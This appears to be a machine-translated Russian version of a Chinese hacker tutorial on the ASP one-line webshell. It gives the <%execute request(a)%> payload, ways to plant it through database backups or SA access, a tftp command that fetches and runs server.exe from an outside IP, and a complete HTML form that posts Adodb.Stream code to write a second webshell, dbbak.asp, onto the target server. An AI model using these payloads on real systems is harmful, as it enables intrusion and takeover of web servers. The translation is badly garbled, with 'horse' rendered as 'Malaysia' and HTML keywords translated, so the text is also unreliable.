Троян, состоящий из одного предложения, вставляется в файл ASP: Разумеется, троян, состоящий из одного предложения, сам по себе является файлом ASP. Доступен через IE: только если к нему есть доступ, мы можем отправить данные. Пока к ним есть доступ, они могут быть доступны.
Доступ по протоколу HTTP
В одном предложении сфера использования троянов (я перечислил только 2 типа):
1) Требуется только резервное копирование базы данных.
При резервном копировании базы данных в файл asp ошибка компиляции не возникает, а флаг закрытия сценария отсутствует %>
2) При настройке разрешений SA обычно для удобства сначала пишете предложение (Конечно, быстрее загрузить голубей напрямую через tftp и запустить их).
tftp -i ip получить server.exe
Принцип работы троянского коня <%execute request(a)%> в одном предложении:
узнай сначала
Функция выполнения() используется для выполнения кода asp. Она отвечает за выполнение загруженной нами лошади и передачу ее в asp.dll для анализа. Приведенный выше код <%execute request(a)%> можно объяснить следующим образом:
<%
если запрос(а)<>, то выполнить запрос(а)
%>
Если a не пусто, оно будет выполнено. Что будет выполнено?...
если а != 0
Давайте посмотрим на клиента:
<form action=http://192.168.0.28/shell.asp метод=post>
<имя текстовой области=l cols=120 строк=10 ширина=45>
set lp=server.CreateObject(Adodb.Stream) 'Создать компонент Adodb.Stream..
LP.Открыть
лП.Тип=2
lP.CharSet=gb2312
запрос lP.writetext(p)
lP.SaveToFile server.mappath(dbbak.asp),2
LP.Закрыть
установить LP=ничего
ответ.перенаправление dbbak.asp
</textarea>
<textarea name=p cols=120 rows=10 width=45>Данные для отправки</textarea><BR><center><br>
<тип ввода=отправить значение=отправить>
Adodb.Stream отвечает за загрузку прочитанных данных на сервер:
Компонент: Adodb.Stream
Существуют следующие методы:
Отменить метод
Как его использовать
Объект.Отмена
Описание: Отменяет выполнение ожидающего асинхронного вызова метода Execute или Open.
Метод WriteText
Как его использовать:
Object.Write(Данные,[Параметры])
Описание: Загрузите указанные текстовые данные в объект.
Описание параметра: Данные — это указанное содержимое, которое необходимо записать.
Параметры. Параметры для записи, которые можно не указывать. Необязательные параметры следующие:
adWriteChar = 0
adWriteLine = 1
метод Саветофиле
Как его использовать:
Object.SaveToFile(ИмяФайла,[Параметры])
Описание: запись содержимого объекта в файл, указанный FileName.
То есть имя файла, куда мы сохраняем трояна, — dbbak.asp.
Описание параметра: Файл, указанный FileName.
Опции доступа к опциям, которые можно оставить неуказанными. Необязательные параметры:
adSaveCreateNotExist = 1
adSaveCreateOverWrite = 2
После отправки трояна-предложения значение a пусто и ожидает записанного значения. Доступ к http://www.***.com/**.asp — это процесс ожидания. Как подготовиться к выполнению с помощью метода Execute(. ) функция.. .
Создадим Adodb.Stream, отвечающий за запись наших данных на сервер...
В то же время переменная SaveToFile, определенная этим компонентом, определяет наше малазийское имя..dbbak.asp.
После отправки на сервер функция выполнения() обнаруживает, что значение a не пусто, поэтому выполняет нашу Малайзию!